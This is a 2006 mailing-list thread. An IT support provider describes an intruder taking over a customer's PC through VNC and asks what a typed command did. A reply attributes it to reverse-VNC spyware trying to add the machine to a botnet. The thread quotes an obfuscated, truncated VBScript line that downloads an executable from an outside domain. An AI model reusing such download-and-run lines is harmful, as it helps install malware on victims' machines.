dunno what was going on there but your user definitely was rooted with a malicious vnc. it's a common tactic, person visits website, gets spyware'd, spyware installs a reverse-vnc connection so the attacker can gain control over the box even if it is behind a firewall. What you were seeing was most likely an attempt to inject more payload into the machine in order for it to become part of a botnet.
unless someone was playing an elaborate joke which I doubt. tell the user to use Firefox. It even works with SL! (after you wipe the PC. You have to nuke it from orbit. It's the only way to be sure.) -----Original Message----- From: Chris Curtis [mailto:[EMAIL PROTECTED] Sent: Wednesday, September 27, 2006 4:31 PM To: [email protected] Subject: [SL] Off topic question Hello All. This is very off topic, but I figure it won't kill anyone if I ask. There are a number of very smart cookies on this list, and I bet someone out there can enlighten me. Today I got a call from one off my customers who runs VNC for remote support access. She was working away, and suddenly her mouse started to move, it opened up a CMD session (it's really a DOS session, but we aren't supposed to know that Windows is just another DOS app are we!!!) and it typed the following: C:\Documents and Settings\sales>CD %TMP%&ECHO On ERROR RESUmE nExt:F="L.eXe":SEt p=cREAtEOBjEct("mSxmL2.xmLhttp"):p.OpEn"gEt","HtTp://WwW.JmDoNgyI.CoM/ NETSTAT On ERROR RESUmE nExt:F="L.eXe":SEt p=cREAtEOBjEct ("mSxmL2.xmLhttp"):p.OpEn"gEt", "HtTp://WwW.JmDoNgyI.CoM/ Now, I am not an XML guy, but it looks to me like this person was trying to use XML and download content from a likely infected website. I went to the website (I use a MAC, so I don't generally worry about getting a browser hack) and, you guessed it, it was a Chinese site. I googled the www.jmdongyi.com name but got no hits. I connected to her PC and found no strange connections to it at the time. I ran a malware, virus scan and it was clean also. I had her turn off vnc for now and explained to her how she could turn it on when she needs to allow someone access. Incidentally, she was using a non dictionary password with alpha and numeric characters. My question is, what was the XML string actually trying to do. Thanks to all who offer assistance. Chris Curtis Sandpoint Computers Office 208-265-1608 Cell 208-610-3062 ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys -- and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV _______________________________________________ sql-ledger-users mailing list [email protected] https://lists.sourceforge.net/lists/listinfo/sql-ledger-users ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys -- and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV _______________________________________________ sql-ledger-users mailing list [email protected] https://lists.sourceforge.net/lists/listinfo/sql-ledger-users
